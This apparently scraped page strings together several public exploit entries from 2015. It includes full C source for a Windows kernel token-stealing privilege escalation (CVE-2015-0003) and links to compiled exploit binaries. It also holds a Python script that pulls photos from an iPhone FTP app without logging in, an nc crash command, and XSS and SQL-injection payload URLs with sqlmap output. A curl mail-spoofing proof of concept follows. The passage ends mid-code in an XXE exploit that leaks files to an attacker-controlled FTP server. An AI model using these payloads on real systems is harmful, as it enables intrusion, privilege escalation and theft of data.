HireHackking

# Source: https://github.com/hfiref0x/CVE-2015-1701 Win32k LPE vulnerability used in APT attack Original info: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Credits R136a1 / hfiref0x ## Compiled EXE: ### x86 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe + Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-32.exe ### x64 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe + Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-64.exe ## Source Code: + https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip + EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-src.zip

#!/usr/bin/env python #================================================================================== # Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service # Date: 2015-05-25 # Exploit Author: Wh1t3Rh1n0 (Michael Allen) # Exploit Author's Homepage: http://www.mikeallen.org # Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302 # Version: 3.0 # Tested on: iPhone #================================================================================== # ------------------ # Denial of Service: # ------------------ # The FTP server does not properly handle errors raised by invalid # FTP commands. The following command, which sends an invalid PORT command to # the FTP server, will crash the server once it is received. # echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000 # ---------------------- # Authentication Bypass: # ---------------------- # The FTP server does not handle unauthenticated connections or incorrect login # credentials properly. A remote user can issue commands to the FTP server # without authenticating or after entering incorrect credentials. # The following proof-of-concept connects to the given FTP server and # downloads all files stored in the "Camera Roll" folder without providing a # username or password: import sys from ftplib import FTP if len(sys.argv) <= 1: print "Usage: ./ftp-nologin.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) files = [] def append_file(s): files.append(s.split(' ')[-1]) blocks = [] def get_blocks(d): blocks.append(d) ftp = FTP() print ftp.connect(host, port) ftp.set_pasv(1) ftp.cwd("Camera Roll") print ftp.retrlines('LIST', append_file) files.pop(0) for filename in files: print "Downloading %s..." % filename ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks) f = open(filename, 'wb') for block in blocks: f.write(block) f.close() print "[+] File saved to: %s" % filename blocks = [] ftp.quit()

// ex.cpp /* Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP CVE-2015-0003 March 2015 (Public Release: May 24, 2015) Tested on: x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 x64: Win 2k8 SP1 | Win 2k8 R2 SP1 Author: Skylake - skylake <at> mail <dot> com */ #include "ex.h" _ZwAllocateVirtualMemory ZwAllocateVirtualMemory; _PsLookupProcessByProcessId PsLookupProcessByProcessId; _PsReferencePrimaryToken PsReferencePrimaryToken; DWORD Pid; ATOM atom; BOOL KrnlMode, bSpawned; DWORD_PTR WINAPI pti() { #ifdef _M_X64 LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); #else LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); #endif } BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) { DWORD_PTR dwIndex, dwMask; #ifdef _M_X64 dwMask = ~0xf; #else dwMask = ~7; #endif // dwCurrentValue &= dwMask; for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) { if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) { // pdwStructure[dwIndex] = dwNewValue; return TRUE; } } return FALSE; } BOOL WINAPI Init() { HMODULE hMod = NULL; PVOID Base = NULL; OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; PSYSTEM_MODULE_INFORMATION pm = NULL; BOOL RetVal = FALSE; __try { if( !GetVersionEx( &ov ) ) __leave; if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) { atom = 0xc039; } else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) { atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a; } if( !atom ) __leave; _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); if( !ZwQuerySystemInformation ) __leave; ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); if( !ZwAllocateVirtualMemory ) __leave; ULONG len; LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); if( !status ) __leave; pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); if( !pm ) __leave; status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); if( status ) __leave; CHAR szKrnl[MAX_PATH] = { 0 }, *t; for( ULONG i = 0; i < pm->Count; ++i ) { if( strstr( pm->Module[i].ImageName, "exe" ) ) { t = strstr( pm->Module[i].ImageName, "nt" ); if( t ) { strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); Base = pm->Module[i].Base; break; } } } hMod = LoadLibraryA( szKrnl ); if( !hMod || !Base ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); if( !PsLookupProcessByProcessId ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); if( !PsReferencePrimaryToken ) __leave; PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); Pid = GetCurrentProcessId(); RetVal = TRUE; } __finally { if( pm ) LocalFree( pm ); if( hMod ) FreeLibrary( hMod ); } return RetVal; } LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) { LPVOID pCurProcess = NULL; LPVOID pSystemInfo = NULL; PACCESS_TOKEN systemToken; PACCESS_TOKEN targetToken; PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); targetToken = PsReferencePrimaryToken( pCurProcess ); systemToken = PsReferencePrimaryToken( pSystemInfo ); // find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 ); KrnlMode = TRUE; return 0; } VOID WINAPI leave() { keybd_event( VK_ESCAPE, 0, 0, NULL ); keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); } LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) { if( bSpawned ) { leave(); ExitProcess( 0 ); } switch( message ) { case WM_CREATE: SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); FlashWindow( hWnd, TRUE ); keybd_event( VK_LWIN, 0, 0, NULL ); break; case WM_CLOSE: DestroyWindow( hWnd ); break; case WM_DESTROY: PostQuitMessage( 0 ); break; case WM_TIMER: KillTimer( hWnd, ID_TIMER ); leave(); DestroyWindow( hWnd ); break; default: return DefWindowProc( hWnd, message, wParam, lParam ); } return 0; } int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow ) { WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; HWND hWnd = NULL; MSG Msg = { 0 }; SIZE_T size = 0x1000; LPVOID addr = ( LPVOID ) 1; if( !Init() ) return 1; if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) { // return 1; } DWORD_PTR p = pti(); if( !p ) return 1; #ifdef _M_X64 *( ( PDWORD_PTR ) 0x10 ) = p; *( ( LPBYTE ) 0x2a ) = 4; *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; *( ( PDWORD_PTR ) 0xa8 ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( PDWORD_PTR ) 0x408 ) = 0x800; *( ( LPWORD ) 0x410 ) = atom; *( ( LPBYTE ) 0x412 ) = 1; #else *( ( LPDWORD ) 0x08 ) = p; *( ( LPBYTE ) 0x16 ) = 4; *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; *( ( LPDWORD ) 0x6c ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( LPDWORD ) 0x408 ) = 0x800; *( ( LPWORD ) 0x40c ) = atom; *( ( LPBYTE ) 0x40e ) = 1; #endif wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = TEXT( "Class" ); if( !RegisterClassEx( &wc ) ) return 1; hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL ); if( !hWnd ) return 1; ShowWindow( hWnd, SW_HIDE ); UpdateWindow( hWnd ); while( GetMessage( &Msg, NULL, 0, 0 ) ) { if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 { if( !KrnlMode ) { Msg.hwnd = ( HWND ) NULL; } else { Msg.hwnd = hWnd; if( !bSpawned ) { ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); bSpawned = TRUE; } } } TranslateMessage( &Msg ); DispatchMessage( &Msg ); } return ( int ) Msg.wParam; } // EOF //ex.h #pragma once #include <windows.h> #include <stdio.h> #include <tchar.h> typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect ); typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process ); typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process ); typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemModuleInformation = 11 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { HANDLE Section; PVOID MappedBase; PVOID Base; ULONG Size; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; #define ID_TIMER 0x1 #define WM_SYSTIMER 0x118 // EOF

source: https://www.securityfocus.com/bid/53202/info Waylu CMS is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. HTML Injection http://www.example.com/WebApps/products_xx.php?id=[XSS] SQL Injection http://www.example.com/WebApps/products_xx.php?id=[SQL Injection]

source: https://www.securityfocus.com/bid/53268/info concrete5 is prone to information-disclosure, SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to harvest sensitive information, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. concrete5 5.5.2.1 is vulnerable; other versions may also be affected. http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form

source: https://www.securityfocus.com/bid/53237/info The Video Gallery component for Joomla! is prone to local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks. The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. http://www.example.com/index.php?option=com_videogallery&Itemid=68' http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]-- http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00

source: https://www.securityfocus.com/bid/53208/info The CCNewsLetter module for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. CCNewsLetter 1.0.7 is vulnerable; prior versions may also be affected. http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]

source: https://www.securityfocus.com/bid/53273/info Quick.CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Quick.CMS 4.0 is vulnerable; other versions may also be affected. http://www.example.com/admin/?p=[xss]

source: https://www.securityfocus.com/bid/53269/info gpEasy is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. gpEasy 2.3.3 is vulnerable; other versions may also be affected. http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1>

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/newstatpress/ # Active installs: 20,000+ # Vulnerable version: 0.9.8 # Fixed version: 0.9.9 # CVE: CVE-2015-4062, CVE-2015-4063 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] (CVE-2015-4062) ----------------------------------------------- * CODE: includes/nsp_search.php:94 +++++++++++++++++++++++++++++++++++++++++ for($i=1;$i<=3;$i++) { if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) { $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'"; } } +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1 [............] GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 89 HTTP(s) requests: --- Parameter: where1 (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search --- [12:25:59] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated XSS [CWE-79] (CVE-2015-4063) ---------------------------------------------- includes/nsp_search.php:128 +++++++++++++++++++++++++++++++++++++++++ for($i=1;$i<=3;$i++) { if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; } } +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search Timeline ========== 2015-05-09: Discovered vulnerability. 2015-05-19: Vendor notification. 2015-05-19: Vendor response. 2015-05-20: Vendor fix. 2015-05-25: Public disclosure.

###################### # Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page # Exploit Author : Claudio Viviani # Website Author: http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive) # Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: index of "contus-video-gallery" # Date : 2015-04-05 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page. This vulnerability is exploitable to dos, phishing, mailbombing, spam... The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php) /** * Email function */ add_action( 'wp_ajax_email', 'email_function' ); add_action( 'wp_ajax_nopriv_email', 'email_function' ); function email_function() { require_once( dirname( __FILE__ ) . '/email.php' ); die(); } Any user can send email from /contus-video-gallery/email.php to any recipients. The variables used to send emails are: $to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL ); $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL ); $url = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL ); $subject = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING ); $message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING ); $title = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING ); $referrer = parse_url( $_SERVER['HTTP_REFERER'] ); $referrer_host = $referrer['scheme'] . '://' . $referrer['host']; $pageURL = 'http'; It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email: if ( $referrer_host === $pageURL ) { $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; $headers .= "From: " . "<" . $from . ">\r\n"; $headers .= "Reply-To: " . $from . "\r\n"; $headers .= "Return-path: " . $from; $username = explode('@' , $from ); $username = ucfirst($username['0']); $subject = $username . ' has shared a video with you.'; $emailtemplate_path = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html'; $message = file_get_contents( $emailtemplate_path); $message = str_replace( '{subject}', $subject, $message ); $message = str_replace( '{message}', $message_content, $message); $message = str_replace( '{videourl}',$url,$message ); $message = str_replace('{username}',$username ,$message ); if ( @mail( $to, $title, $message, $headers ) ) { echo 'success=sent'; } else { echo 'success=error'; } } else { echo 'success=error'; } The “Referer” field can easily be modified by the attacker! ###################### # PoC curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \ -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email cUrl switch "-e" spoof referer address # Http Response success=sent # Poc Video http://youtu.be/qgOGPm1-tNc ####################### Discovered By : Claudio Viviani http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit) http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################

# Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/landing-pages/ # Active installs: 20,000+ # Vulnerable version: 1.8.4 # Fixed version: 1.8.5 # CVE: CVE-2015-4064, CVE-2015-4065 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] (CVE-2015-4064) ----------------------------------------------- * CODE: modules/module.ab-testing.php:100 +++++++++++++++++++++++++++++++++++++++++ $wpdb->query(" SELECT `meta_key`, `meta_value` FROM $wpdb->postmeta WHERE `post_id` = ".$_GET['post']." "); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post [............] GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 86 HTTP(s) requests: --- Parameter: post (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation --- [13:35:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated XSS [CWE-79] (CVE-2015-4065) ---------------------------------------------- * CODE: shared/shortcodes/inbound-shortcodes.php:761 +++++++++++++++++++++++++++++++++++++++++ <iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe> +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post='></iframe><script>alert(String.fromCharCode(88, 83, 83))</script> Timeline ========== 2015-05-09: Discovered vulnerability. 2015-05-20: Vendor notification. 2015-05-20: Vendor response. 2015-05-22: Vendor fix. 2015-05-25: Public disclosure.

#!/usr/bin/env python """ # Exploit Title: Jackrabbit WebDAV XXE # Date: 25-05-2015 # Software Link: http://jackrabbit.apache.org/jcr/ # Exploit Author: Mikhail Egorov # Contact: 0ang3el () gmail com # Website: http://0ang3el.blogspot.com # CVE: CVE-2015-1833 # Category: webapps 1. Description Jackrabbit WebDAV plugin use insecurely configured XML parser to parse incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to XXE attacks. Besides Jackrabbit JCR, WebDAV plugin is incorporated into the following software: Apache Sling, Adobe AEM. 2. Proof of Concept Download vulnerable Apache Sling launchpad web application from here - https://sling.apache.org Start launchpad web application as follows: root@kali:~/build-sling# java -jar org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar Launch exploit with the following command: root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe --tech oob --ip 127.0.0.1 enter command> get . loaded 210 bytes in buffer enter command> show apache-maven-3.0.5 apache-maven-3.0.5-bin.tar.gz derby.log eclipse hs_err_pid5379.log org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar python-workspace enter command> store /tmp/cwd.lst buffer content has been stored in file /tmp/cwd.lst enter command> exit root@kali:~# Exploit have three exploitation techniques: * inb1 - inbound XXE technique, it first writes content as attribute value of controllable JCR node using PROPPATCH request and then retrieves content using PROPFIND request * inb2 - same as inb1, but there is some XML magic to retrieve content that is not valid XML data * oob - out-of-bound technique, utilizes FTP hack from this blog http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html Technique inb2 is the most stable. But it requires credentials of the user that is able to modify some JCR node. Attacker host must have "visible ip" which is required for communication between target and attacker's host. Technique oob works even with anonymous credentials. But it is not so stable as inb2 technique. Technique inb1 does not require "visible ip", but there are limitations on retrieved content. 3. Solution: If you use Apache Jackrabbit, install version 2.10.1. http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt """ from urllib2 import * import sys, string, random import base64 import xml.etree.ElementTree as ET import BaseHTTPServer, SimpleHTTPServer from multiprocessing import Process, Value, Manager from optparse import OptionParser import socket, select usage= """ %prog --url <url> --tech inb1 [ --creds <creds> ] %prog --url <url> --tech inb2 --ip <ip> [ --creds <creds> --hport <hport> ] %prog --url <url> --tech oob --ip <ip> [ --creds <creds> --hport <hport> --fport <fport>] """ help_interpreter = """ help - print this help. get <dir or file> - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing). show - show content of internal buffer. store <out file> - store internal buffer in file. exit - stop exploiting """ failure_descr = """ Possible reasons: 1. Inappropriate technique, try another options. 2. You do not have permissions to read file or list directory. 3. Target is not exploitable. """ rand_attr = '' script_name = sys.argv[0].split('/')[-1] buffer_with_loot = '' url, tech, ip, creds, hport, fport = [None] * 6 http_server, ftp_server = [None] * 2 class HTTP_XXE(): def __init__(self, ip, port, fport): self.port = port self.ip = ip self.fport = fport def run(self): class http_handler(BaseHTTPServer.BaseHTTPRequestHandler): def __init__(self, ip, fport,*args): self.ip = ip self.fport = fport BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args) def do_GET(self): if "inb2" in self.path: self.send_response(200) self.send_header('Content-type','application/xml') self.end_headers() self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY all "%start;%loot;%end;">') if "oob" in self.path: self.send_response(200) self.send_header('Content-type','application/xml') self.end_headers() self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY %% all "<!ENTITY &#37; send SYSTEM "ftp://%(ip)s:%(port)s/%%loot;">">%%all;' % {'ip' : self.ip, 'port' : self.fport}) def log_message(self, format, *args): # silent HTTP server return def serve(httpd): while True: httpd.handle_request() handler = lambda *args: http_handler(self.ip, self.fport, *args) httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler) self.proc = Process(target = serve, args = (httpd,)) self.proc.start() def stop(self): self.proc.terminate() class FTP_XXE(): def __init__(self, port): self.port = port def run(self): class ftp_handler(): def __init__(self, port): self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.server.setblocking(0) self.server.bind(('0.0.0.0', port)) self.server.listen(5) def serve(self, d): inputs = [self.server] while True: readable, writable, exceptional = select.select(inputs, [], []) for s in readable: if s is self.server: connection, client_address = s.accept() connection.setblocking(0) inputs.append(connection) connection.send("220 xxe-ftp-server\n") else: data = s.recv(1024) if not data: inputs.remove(s) continue if "USER" in data: s.send("331 password please - version check\n") else: s.send("230 more data please!\n") if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]): d['loot'] += data self.d = Manager().dict() self.d['loot'] = '' ftpd = ftp_handler(self.port) self.proc = Process(target = ftpd.serve, args=(self.d,)) self.proc.start() def stop(self): self.proc.terminate() def clean_buf(self): self.d['loot'] = '' def get_loot(self): loot = self.d['loot'] # clean data loot = loot.replace('\r\nRETR ','/') loot = loot.replace('\r\nCWD ','/') loot = loot.replace('CWD ','',1) loot = loot.replace('RETR ','',1) return loot def exploit(url, technique, creds = 'anonymous:anonymous'): global buffer_with_loot, rand_attr requests = { 'inb1' : { 'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM "%(file)s"> ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&loot;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>', 'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>' }, 'inb2' : { 'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/inb2"> %%dtd; ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&all;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>', 'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>' }, 'oob' : { 'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE propfind [ <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/oob"> %%dtd; %%send; ]> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>' } } def request(url, verb, data, creds, timeout): req = Request(url, data) req.add_header('User-Agent', script_name) req.add_header('Content-Type', 'application/xml') req.add_header('Authorization', 'Basic ' + base64.b64encode(creds)) req.get_method = lambda: verb #req.set_proxy('127.0.0.1:8081','http') ### For debug resp = None try: resp = urlopen(req, timeout = timeout).read() except Exception, e: pass return resp while 1: cmdline = raw_input('\033[33menter command> \033[0m') cmdline = re.sub('\s+', ' ', cmdline) cmd = cmdline.split(' ')[0] arg = cmdline.split(' ')[-1] if cmd not in ['help', 'get', 'show', 'store', 